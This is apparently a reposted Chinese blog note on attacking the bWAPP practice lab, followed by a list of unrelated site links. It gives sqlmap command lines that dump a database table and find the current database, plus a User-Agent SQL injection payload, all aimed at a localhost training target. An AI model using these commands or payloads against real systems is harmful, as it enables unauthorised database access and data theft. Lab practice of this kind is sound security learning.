bwapp 随笔
来源:互联网 发布:鹰朗el01淘宝假货 编辑:程序博客网 时间:2024/06/05 06:22
SQL Injection (GET/Search)
C:\Python27\sqlmap>python sqlmap.py -u "http://localhost/bwapp/sqli_1.php?titl
e=sfsdf&action=search" --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c84;security_level=0" --dbms=mysql --batch -D bwapp -T movies -C "title,id" --dump
sql post
C:\Python27\sqlmap>python sqlmap.py -u "http://localhost/bwapp/sqli_6.php" --
data="title=sdfsdf&action=search" --cookie="PHPSESSID=k60mg7l865e7l5jrp9gr8l6c8
4;security_level=0" --dbms=mysql --batch --current-db
SQL Injection (AJAX/JSON/jQuery)-- 待分析 。
====================================================
SQL Injection - Stored (User-Agent)
可以看出是用的ua 字段。 通过bs 修改ua 可以看出修改的结果。
然后将ua 修改为 ‘ ,出现错误, 出现注入点。
修改 为 ', 'sdfsdf')# ok
修改 第二个参数为 select 语句,得到注入结果。
阅读全文
0 0
- bwapp 随笔
- bwapp medium writeup
- 树莓派搭建虚拟渗透网站Bwapp
- BWAPP:一款非常好用的漏洞演示平台
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 随笔
- 20多条总结学完SymPy库
- Day13
- 拓扑排序 [HNOI2015]菜肴制作
- Maven 项目中pom.xml 文件 Write error
- 2017.8.11
- bwapp 随笔
- scrollview+edittext实现批量输入效果
- 二维数组中的查找
- BZOJ3110 K大数查询 <树套树>
- 文本处理sed
- 这是我的第一篇个人博客, 算是新的起点
- JAVA CAS原理深度分析
- hdu5877(离散化树状数组&dfs回溯)
- 如何解决Oracle EBS并发请求错误:Program was terminated by signal 11